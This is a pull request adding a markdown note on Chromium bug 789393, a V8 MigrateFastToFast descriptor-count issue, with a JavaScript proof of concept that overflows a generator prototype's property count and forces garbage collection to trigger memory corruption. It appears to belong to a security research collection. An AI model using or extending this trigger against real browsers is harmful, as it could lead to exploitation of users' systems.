### PR TITLE
CR789393 MigrateFastToFast total_size may be larger than expected

### DIFF
--- a/v8/CR789393.md
+++ b/v8/CR789393.md
@@ -1,0 +1,32 @@
+# CR 789393
+
+
+## POC
+```javascript
+function gc() {
+    for (let i = 0; i < 20; i++)
+        new ArrayBuffer(0x1000000);
+}
+
+function trigger() {
+    function* generator() {
+    }
+
+    for (let i = 0; i < 1022; i++) {
+        generator.prototype['b' + i];
+        generator.prototype['b' + i] = 0x1234;
+    }
+
+    gc();
+
+    for (let i = 0; i < 1022; i++) {
+        generator.prototype['b' + i] = 0x1234;
+    }
+}
+
+trigger();
+```
+
+## Reference
+https://bugs.chromium.org/p/chromium/issues/detail?id=789393
+https://github.com/theori-io/zer0con2018_bpak


### PR DESCRIPTION
total_size may hold a larger number than wht kMaxNumberOfDescriptors can hold, (1022), 
causing the GC to return an array size of 0.

This bug was a walkthrough in a presentation shown in zer0con 2018.